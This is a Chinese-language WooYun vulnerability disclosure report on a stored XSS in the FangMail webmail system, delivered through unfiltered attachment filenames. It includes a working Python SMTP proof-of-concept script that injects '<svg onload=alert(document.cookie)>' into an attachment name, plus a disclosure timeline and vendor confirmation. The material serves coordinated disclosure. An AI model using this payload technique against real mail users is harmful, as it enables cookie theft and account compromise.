当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-065658

漏洞标题:FangMail又一处储存型XSS

相关厂商:FangMail

漏洞作者: 夕风号

提交时间:2014-06-22 01:29

修复时间:2014-09-20 01:30

公开时间:2014-09-20 01:30

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-06-22: 细节已通知厂商并且等待厂商处理中
2014-06-26: 厂商已经确认,细节仅向厂商公开
2014-06-29: 细节向第三方安全合作伙伴开放
2014-08-20: 细节向核心白帽子及相关领域专家公开
2014-08-30: 细节向普通白帽子公开
2014-09-09: 细节向实习白帽子公开
2014-09-20: 细节向公众公开

简要描述:

又一处

详细说明:

附件文件名处未过滤,可触发XSS
假设攻击者为attack@attack.com,受害者为victim@victim.com

import smtplib
import base64
sender = 'attack@attack.com'
reciever = 'victim@victim.com'
message = """From: <test> <attack@attack.com>
To: <test> <victim@victim.com>
Subject: Test
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary=\"YOUAREUNDERATTACK\"
--YOUAREUNDERATTACK
Content-Type: multipart/alternative;
boundary=\"YOUAREUNDERATTACK\"
--YOUAREUNDERATTACK
Content-Type: text/plain; charset=GBK
Content-Transfer-Encoding: base64
IFlvdSBhcmUgdW5kZXIgYXR0YWNrLgoKCg==
--YOUAREUNDERATTACK
Content-Type: text/html; charset=GBK
Content-Transfer-Encoding: base64
PGRpdiBzdHlsZT0ibGluZS1oZWlnaHQ6MS43O2NvbG9yOiMwMDAwMDA7Zm9udC1zaXplOjE0cHg7
Zm9udC1mYW1pbHk6YXJpYWwiPjxkaXYgc3R5bGU9ImxpbmUtaGVpZ2h0OjEuNztjb2xvcjojMDAw
MDAwO2ZvbnQtc2l6ZToxNHB4O2ZvbnQtZmFtaWx5OmFyaWFsIj4mbmJzcDtZb3UgYXJlIHVuZGVy
IGF0dGFjay48L2Rpdj48YnI+PGJyPjxzcGFuIHRpdGxlPSJuZXRlYXNlZm9vdGVyIj48c3BhbiBp
ZD0ibmV0ZWFzZV9tYWlsX2Zvb3RlciI+PC9zcGFuPjwvc3Bhbj48L2Rpdj48YnI+PGJyPjxzcGFu
IHRpdGxlPSJuZXRlYXNlZm9vdGVyIj48c3BhbiBpZD0ibmV0ZWFzZV9tYWlsX2Zvb3RlciI+PC9z
cGFuPjwvc3Bhbj4=
--YOUAREUNDERATTACK--
--YOUAREUNDERATTACK
Content-Type: text/plain; name=\"filename.txt<svg onload=alert(document.cookie)>\"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename=\"filename.txt<svg onload=alert(document.cookie)>\"
Q29kZSBpcyBwb2V0cnku
--YOUAREUNDERATTACK--
"""
try:
smtpObj = smtplib.SMTP('smtp.attack.com')
smtpObj.login('attack','password')
smtpObj.sendmail(sender, reciever, message)
print "Successfully sent email"
except Exception:
print "Error: unable to send email"

漏洞证明:

4.png

修复方案:

过滤

版权声明:转载请注明来源 夕风号@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-06-26 22:01

厂商回复:

最新状态:

暂无